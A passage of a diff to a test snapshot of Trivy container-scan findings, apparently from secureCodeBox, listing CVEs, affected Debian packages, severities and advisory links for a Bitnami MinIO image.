"https://errata.rockylinux.org/RLSA-2022:8637", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2007-6755", - "installedVersion": "1.1.1n-0+deb11u3", - "packageName": "libssl1.1", - "references": [ - "http://arstechnica.com/security/2013/09/stop-using-nsa-influence-code-in-our-product-rsa-tells-customers/", - "http://blog.cryptographyengineering.com/2013/09/rsa-warns-developers-against-its-own.html", - "http://blog.cryptographyengineering.com/2013/09/the-many-flaws-of-dualecdrbg.html", - "http://rump2007.cr.yp.to/15-shumow.pdf", - "http://stream.wsj.com/story/latest-headlines/SS-2-63399/SS-2-332655/", - "http://threatpost.com/in-wake-of-latest-crypto-revelations-everything-is-suspect", - "http://www.securityfocus.com/bid/63657", - "https://access.redhat.com/security/cve/CVE-2007-6755", - "https://nvd.nist.gov/vuln/detail/CVE-2007-6755", - "https://www.cve.org/CVERecord?id=CVE-2007-6755", - "https://www.schneier.com/blog/archives/2007/11/the_strange_sto.html", - ], - }, - "category": "Vulnerability", - "description": "The NIST SP 800-90A default statement of the Dual Elliptic Curve Deterministic Random Bit Generation (Dual_EC_DRBG) algorithm contains point Q constants with a possible relationship to certain "skeleton key" values, which might allow context-dependent attackers to defeat cryptographic protection mechanisms by leveraging knowledge of those values. NOTE: this is a preliminary CVE for Dual_EC_DRBG; future research may provide additional details about point Q and associated attacks, and could potentially lead to a RECAST or REJECT of this CVE.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "Dual_EC_DRBG: weak pseudo random number generator", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2007-6755", + "value": "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", }, { "type": "URL", - "value": "http://arstechnica.com/security/2013/09/stop-using-nsa-influence-code-in-our-product-rsa-tells-customers/", + "value": "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", }, { "type": "URL", - "value": "http://blog.cryptographyengineering.com/2013/09/rsa-warns-developers-against-its-own.html", + "value": "https://linux.oracle.com/cve/CVE-2022-42898.html", }, { "type": "URL", - "value": "http://blog.cryptographyengineering.com/2013/09/the-many-flaws-of-dualecdrbg.html", + "value": "https://linux.oracle.com/errata/ELSA-2023-12104.html", }, { "type": "URL", - "value": "http://rump2007.cr.yp.to/15-shumow.pdf", + "value": "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", }, { "type": "URL", - "value": "http://stream.wsj.com/story/latest-headlines/SS-2-63399/SS-2-332655/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", }, { "type": "URL", - "value": "http://threatpost.com/in-wake-of-latest-crypto-revelations-everything-is-suspect", + "value": "https://security.netapp.com/advisory/ntap-20230216-0008/", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/63657", + "value": "https://security.netapp.com/advisory/ntap-20230223-0001/", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2007-6755", + "value": "https://ubuntu.com/security/notices/USN-5800-1", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2007-6755", + "value": "https://ubuntu.com/security/notices/USN-5822-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2007-6755", + "value": "https://ubuntu.com/security/notices/USN-5822-2", }, { "type": "URL", - "value": "https://www.schneier.com/blog/archives/2007/11/the_strange_sto.html", + "value": "https://ubuntu.com/security/notices/USN-5828-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5936-1", + }, + { + "type": "URL", + "value": "https://web.mit.edu/kerberos/advisories/", + }, + { + "type": "URL", + "value": "https://web.mit.edu/kerberos/krb5-1.19/", + }, + { + "type": "URL", + "value": "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-42898", + }, + { + "type": "URL", + "value": "https://www.samba.org/samba/security/CVE-2022-42898.html", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2010-0928", - "installedVersion": "1.1.1n-0+deb11u3", - "packageName": "libssl1.1", + "id": "CVE-2018-5709", + "installedVersion": "1.18.3-6+deb11u1", + "packageName": "libkrb5-3", "references": [ - "http://rdist.root.org/2010/03/08/attacking-rsa-exponentiation-with-fault-injection/", - "http://www.eecs.umich.edu/%7Evaleria/research/publications/DATE10RSA.pdf", - "http://www.networkworld.com/news/2010/030410-rsa-security-attack.html", - "http://www.osvdb.org/62808", - "http://www.theregister.co.uk/2010/03/04/severe_openssl_vulnerability/", - "https://access.redhat.com/security/cve/CVE-2010-0928", - "https://exchange.xforce.ibmcloud.com/vulnerabilities/56750", - "https://nvd.nist.gov/vuln/detail/CVE-2010-0928", - "https://www.cve.org/CVERecord?id=CVE-2010-0928", + "https://access.redhat.com/security/cve/CVE-2018-5709", + "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", + "https://www.cve.org/CVERecord?id=CVE-2018-5709", ], }, "category": "Vulnerability", - "description": "OpenSSL 0.9.8i on the Gaisler Research LEON3 SoC on the Xilinx Virtex-II Pro FPGA uses a Fixed Width Exponentiation (FWE) algorithm for certain signature calculations, and does not verify the signature before providing it to a caller, which makes it easier for physically proximate attackers to determine the private key via a modified supply voltage for the microprocessor, related to a "fault-based attack."", + "description": "An issue was discovered in MIT Kerberos 5 (aka krb5) through 1.16. There is a variable "dbentry->n_key_data" in kadmin/dbutil/dump.c that can store 16-bit data but unknowingly the developer has assigned a "u4" variable to it, which is for 32-bit data. An attacker can use this vulnerability to affect other artifacts of the database as we know that a Kerberos database dump file contains trusted data.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "openssl: RSA authentication weakness", + "name": "krb5: integer overflow in dbentry->n_key_data in kadmin/dbutil/dump.c", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2010-0928", - }, - { - "type": "URL", - "value": "http://rdist.root.org/2010/03/08/attacking-rsa-exponentiation-with-fault-injection/", - }, - { - "type": "URL", - "value": "http://www.eecs.umich.edu/%7Evaleria/research/publications/DATE10RSA.pdf", - }, - { - "type": "URL", - "value": "http://www.networkworld.com/news/2010/030410-rsa-security-attack.html", - }, - { - "type": "URL", - "value": "http://www.osvdb.org/62808", + "value": "https://avd.aquasec.com/nvd/cve-2018-5709", }, { "type": "URL", - "value": "http://www.theregister.co.uk/2010/03/04/severe_openssl_vulnerability/", + "value": "https://access.redhat.com/security/cve/CVE-2018-5709", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2010-0928", + "value": "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", }, { "type": "URL", - "value": "https://exchange.xforce.ibmcloud.com/vulnerabilities/56750", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2010-0928", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2010-0928", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-5709", }, ], "severity": "LOW", }, { "attributes": { - "fixedVersion": "247.3-7+deb11u2", + "fixedVersion": "1.18.3-6+deb11u3", "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-3821", - "installedVersion": "247.3-7", - "packageName": "libsystemd0", + "id": "CVE-2022-42898", + "installedVersion": "1.18.3-6+deb11u1", + "packageName": "libkrb5support0", "references": [ - "https://access.redhat.com/errata/RHSA-2023:0336", - "https://access.redhat.com/security/cve/CVE-2022-3821", - "https://bugzilla.redhat.com/2139327", - "https://bugzilla.redhat.com/show_bug.cgi?id=2139327", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3821", - "https://errata.almalinux.org/9/ALSA-2023-0336.html", - "https://errata.rockylinux.org/RLSA-2023:0336", - "https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e", - "https://github.com/systemd/systemd/issues/23928", - "https://github.com/systemd/systemd/pull/23933", - "https://linux.oracle.com/cve/CVE-2022-3821.html", - "https://linux.oracle.com/errata/ELSA-2023-0336.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RVBQC2VLSDVQAPJTEMTREXDL4HYLXG2P/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-3821", - "https://security.gentoo.org/glsa/202305-15", - "https://ubuntu.com/security/notices/USN-5928-1", - "https://www.cve.org/CVERecord?id=CVE-2022-3821", + "https://access.redhat.com/errata/RHSA-2022:8637", + "https://access.redhat.com/security/cve/CVE-2022-42898", + "https://bugzilla.redhat.com/2140960", + "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", + "https://bugzilla.samba.org/show_bug.cgi?id=15203", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", + "https://errata.almalinux.org/9/ALSA-2022-8637.html", + "https://errata.rockylinux.org/RLSA-2022:8637", + "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", + "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", + "https://linux.oracle.com/cve/CVE-2022-42898.html", + "https://linux.oracle.com/errata/ELSA-2023-12104.html", + "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", + "https://security.netapp.com/advisory/ntap-20230216-0008/", + "https://security.netapp.com/advisory/ntap-20230223-0001/", + "https://ubuntu.com/security/notices/USN-5800-1", + "https://ubuntu.com/security/notices/USN-5822-1", + "https://ubuntu.com/security/notices/USN-5822-2", + "https://ubuntu.com/security/notices/USN-5828-1", + "https://ubuntu.com/security/notices/USN-5936-1", + "https://web.mit.edu/kerberos/advisories/", + "https://web.mit.edu/kerberos/krb5-1.19/", + "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", + "https://www.cve.org/CVERecord?id=CVE-2022-42898", + "https://www.samba.org/samba/security/CVE-2022-42898.html", ], }, "category": "Vulnerability", - "description": "An off-by-one Error issue was discovered in Systemd in format_timespan() function of time-util.c. An attacker could supply specific values for time and accuracy that leads to buffer overrun in format_timespan(), leading to a Denial of Service.", + "description": "PAC parsing in MIT Kerberos 5 (aka krb5) before 1.19.4 and 1.20.x before 1.20.1 has integer overflows that may lead to remote code execution (in KDC, kadmind, or a GSS or Kerberos application server) on 32-bit platforms (which have a resultant heap-based buffer overflow), and cause a denial of service on other platforms. This occurs in krb5_pac_parse in lib/krb5/krb/pac.c. Heimdal before 7.7.1 has "a similar bug."", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "buffer overrun in format_timespan() function", + "name": "integer overflow vulnerabilities in PAC parsing", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-3821", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:0336", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-3821", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2139327", + "value": "https://avd.aquasec.com/nvd/cve-2022-42898", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2139327", + "value": "https://access.redhat.com/errata/RHSA-2022:8637", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3821", + "value": "https://access.redhat.com/security/cve/CVE-2022-42898", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-0336.html", + "value": "https://bugzilla.redhat.com/2140960", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0336", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e", + "value": "https://bugzilla.samba.org/show_bug.cgi?id=15203", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/issues/23928", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/pull/23933", + "value": "https://errata.almalinux.org/9/ALSA-2022-8637.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-3821.html", + "value": "https://errata.rockylinux.org/RLSA-2022:8637", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-0336.html", + "value": "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RVBQC2VLSDVQAPJTEMTREXDL4HYLXG2P/", + "value": "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-3821", + "value": "https://linux.oracle.com/cve/CVE-2022-42898.html", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202305-15", + "value": "https://linux.oracle.com/errata/ELSA-2023-12104.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5928-1", + "value": "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-3821", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": "247.3-7+deb11u2", - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-4415", - "installedVersion": "247.3-7", - "packageName": "libsystemd0", - "references": [ - "https://access.redhat.com/errata/RHSA-2023:0954", - "https://access.redhat.com/security/cve/CVE-2022-4415", - "https://bugzilla.redhat.com/2149063", - "https://bugzilla.redhat.com/2155515", - "https://bugzilla.redhat.com/show_bug.cgi?id=2149063", - "https://bugzilla.redhat.com/show_bug.cgi?id=2155515", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4415", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45873", - "https://errata.almalinux.org/9/ALSA-2023-0954.html", - "https://errata.rockylinux.org/RLSA-2023:0954", - "https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c", - "https://linux.oracle.com/cve/CVE-2022-4415.html", - "https://linux.oracle.com/errata/ELSA-2023-0954.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-4415", - "https://ubuntu.com/security/notices/USN-5928-1", - "https://www.cve.org/CVERecord?id=CVE-2022-4415", - "https://www.openwall.com/lists/oss-security/2022/12/21/3", - ], - }, - "category": "Vulnerability", - "description": "A vulnerability was found in systemd. This security flaw can cause a local information leak due to systemd-coredump not respecting the fs.suid_dumpable kernel setting.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "systemd: local information leak due to systemd-coredump not respecting fs.suid_dumpable kernel setting", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-4415", + "value": "https://security.netapp.com/advisory/ntap-20230216-0008/", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:0954", + "value": "https://security.netapp.com/advisory/ntap-20230223-0001/", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-4415", + "value": "https://ubuntu.com/security/notices/USN-5800-1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2149063", + "value": "https://ubuntu.com/security/notices/USN-5822-1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2155515", + "value": "https://ubuntu.com/security/notices/USN-5822-2", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2149063", + "value": "https://ubuntu.com/security/notices/USN-5828-1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2155515", + "value": "https://ubuntu.com/security/notices/USN-5936-1", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4415", + "value": "https://web.mit.edu/kerberos/advisories/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45873", + "value": "https://web.mit.edu/kerberos/krb5-1.19/", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-0954.html", + "value": "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0954", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-42898", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c", + "value": "https://www.samba.org/samba/security/CVE-2022-42898.html", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2018-5709", + "installedVersion": "1.18.3-6+deb11u1", + "packageName": "libkrb5support0", + "references": [ + "https://access.redhat.com/security/cve/CVE-2018-5709", + "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", + "https://www.cve.org/CVERecord?id=CVE-2018-5709", + ], + }, + "category": "Vulnerability", + "description": "An issue was discovered in MIT Kerberos 5 (aka krb5) through 1.16. There is a variable "dbentry->n_key_data" in kadmin/dbutil/dump.c that can store 16-bit data but unknowingly the developer has assigned a "u4" variable to it, which is for 32-bit data. An attacker can use this vulnerability to affect other artifacts of the database as we know that a Kerberos database dump file contains trusted data.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "krb5: integer overflow in dbentry->n_key_data in kadmin/dbutil/dump.c", + "references": [ { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-4415.html", + "value": "https://avd.aquasec.com/nvd/cve-2018-5709", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-0954.html", + "value": "https://access.redhat.com/security/cve/CVE-2018-5709", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4415", + "value": "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5928-1", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-4415", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/12/21/3", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-5709", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2013-4392", - "installedVersion": "247.3-7", - "packageName": "libsystemd0", + "id": "CVE-2023-2953", + "installedVersion": "2.4.57+dfsg-3+deb11u1", + "packageName": "libldap-2.4-2", "references": [ - "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", - "http://www.openwall.com/lists/oss-security/2013/10/01/9", - "https://access.redhat.com/security/cve/CVE-2013-4392", - "https://bugzilla.redhat.com/show_bug.cgi?id=859060", - "https://nvd.nist.gov/vuln/detail/CVE-2013-4392", - "https://www.cve.org/CVERecord?id=CVE-2013-4392", + "https://access.redhat.com/security/cve/CVE-2023-2953", + "https://bugs.openldap.org/show_bug.cgi?id=9904", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2953", + "https://nvd.nist.gov/vuln/detail/CVE-2023-2953", + "https://www.cve.org/CVERecord?id=CVE-2023-2953", ], }, "category": "Vulnerability", - "description": "systemd, when updating file permissions, allows local users to change the permissions and SELinux security contexts for arbitrary files via a symlink attack on unspecified files.", + "description": "A vulnerability was found in openldap. This security flaw causes a null pointer dereference in ber_memalloc_x() function.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "TOCTOU race condition when updating file permissions and SELinux security contexts", + "name": "null pointer dereference in ber_memalloc_x function", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2013-4392", + "value": "https://avd.aquasec.com/nvd/cve-2023-2953", }, { "type": "URL", - "value": "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", + "value": "https://access.redhat.com/security/cve/CVE-2023-2953", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2013/10/01/9", + "value": "https://bugs.openldap.org/show_bug.cgi?id=9904", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2013-4392", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2953", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=859060", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-2953", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4392", - }, - { - "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2013-4392", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-2953", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2020-13529", - "installedVersion": "247.3-7", - "packageName": "libsystemd0", + "id": "CVE-2015-3276", + "installedVersion": "2.4.57+dfsg-3+deb11u1", + "packageName": "libldap-2.4-2", "references": [ - "http://www.openwall.com/lists/oss-security/2021/08/04/2", - "http://www.openwall.com/lists/oss-security/2021/08/17/3", - "http://www.openwall.com/lists/oss-security/2021/09/07/3", - "https://access.redhat.com/security/cve/CVE-2020-13529", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13529", - "https://linux.oracle.com/cve/CVE-2020-13529.html", - "https://linux.oracle.com/errata/ELSA-2021-4361.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", - "https://nvd.nist.gov/vuln/detail/CVE-2020-13529", - "https://security.gentoo.org/glsa/202107-48", - "https://security.netapp.com/advisory/ntap-20210625-0005/", - "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1142", - "https://ubuntu.com/security/notices/USN-5013-1", - "https://ubuntu.com/security/notices/USN-5013-2", - "https://www.cve.org/CVERecord?id=CVE-2020-13529", + "http://rhn.redhat.com/errata/RHSA-2015-2131.html", + "http://www.oracle.com/technetwork/topics/security/linuxbulletinoct2015-2719645.html", + "http://www.securitytracker.com/id/1034221", + "https://access.redhat.com/security/cve/CVE-2015-3276", + "https://bugzilla.redhat.com/show_bug.cgi?id=1238322", + "https://linux.oracle.com/cve/CVE-2015-3276.html", + "https://linux.oracle.com/errata/ELSA-2015-2131.html", + "https://nvd.nist.gov/vuln/detail/CVE-2015-3276", + "https://www.cve.org/CVERecord?id=CVE-2015-3276", ], }, "category": "Vulnerability", - "description": "An exploitable denial-of-service vulnerability exists in Systemd 245. A specially crafted DHCP FORCERENEW packet can cause a server running the DHCP client to be vulnerable to a DHCP ACK spoofing attack. An attacker can forge a pair of FORCERENEW and DCHP ACK packets to reconfigure the server.", + "description": "The nss_parse_ciphers function in libraries/libldap/tls_m.c in OpenLDAP does not properly parse OpenSSL-style multi-keyword mode cipher strings, which might cause a weaker than intended cipher to be used and allow remote attackers to have unspecified impact via unknown vectors.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "systemd: DHCP FORCERENEW authentication not implemented can cause a system running the DHCP client to have its network reconfigured", + "name": "incorrect multi-keyword mode cipherstring parsing", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-13529", + "value": "https://avd.aquasec.com/nvd/cve-2015-3276", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/08/04/2", + "value": "http://rhn.redhat.com/errata/RHSA-2015-2131.html", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/08/17/3", + "value": "http://www.oracle.com/technetwork/topics/security/linuxbulletinoct2015-2719645.html", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/09/07/3", + "value": "http://www.securitytracker.com/id/1034221", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-13529", + "value": "https://access.redhat.com/security/cve/CVE-2015-3276", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13529", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1238322", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2020-13529.html", + "value": "https://linux.oracle.com/cve/CVE-2015-3276.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-4361.html", + "value": "https://linux.oracle.com/errata/ELSA-2015-2131.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2015-3276", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-13529", + "value": "https://www.cve.org/CVERecord?id=CVE-2015-3276", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2017-14159", + "installedVersion": "2.4.57+dfsg-3+deb11u1", + "packageName": "libldap-2.4-2", + "references": [ + "http://www.openldap.org/its/index.cgi?findid=8703", + "https://access.redhat.com/security/cve/CVE-2017-14159", + "https://nvd.nist.gov/vuln/detail/CVE-2017-14159", + "https://www.cve.org/CVERecord?id=CVE-2017-14159", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + ], + }, + "category": "Vulnerability", + "description": "slapd in OpenLDAP 2.4.45 and earlier creates a PID file after dropping privileges to a non-root account, which might allow local users to kill arbitrary processes by leveraging access to this non-root account for PID file modification before a root script executes a "kill \`cat /pathname\`" command, as demonstrated by openldap-initscript.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "openldap: Privilege escalation via PID file manipulation", + "references": [ { "type": "URL", - "value": "https://security.gentoo.org/glsa/202107-48", + "value": "https://avd.aquasec.com/nvd/cve-2017-14159", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210625-0005/", + "value": "http://www.openldap.org/its/index.cgi?findid=8703", }, { "type": "URL", - "value": "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1142", + "value": "https://access.redhat.com/security/cve/CVE-2017-14159", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5013-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-14159", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5013-2", + "value": "https://www.cve.org/CVERecord?id=CVE-2017-14159", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-13529", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, ], "severity": "LOW", }, { "attributes": { - "fixedVersion": "4.16.0-2+deb11u1", + "fixedVersion": undefined, "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-46848", - "installedVersion": "4.16.0-2", - "packageName": "libtasn1-6", + "id": "CVE-2017-17740", + "installedVersion": "2.4.57+dfsg-3+deb11u1", + "packageName": "libldap-2.4-2", "references": [ - "https://access.redhat.com/errata/RHSA-2023:0343", - "https://access.redhat.com/security/cve/CVE-2021-46848", - "https://bugs.gentoo.org/866237", - "https://bugzilla.redhat.com/2140058", - "https://bugzilla.redhat.com/show_bug.cgi?id=2140058", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46848", - 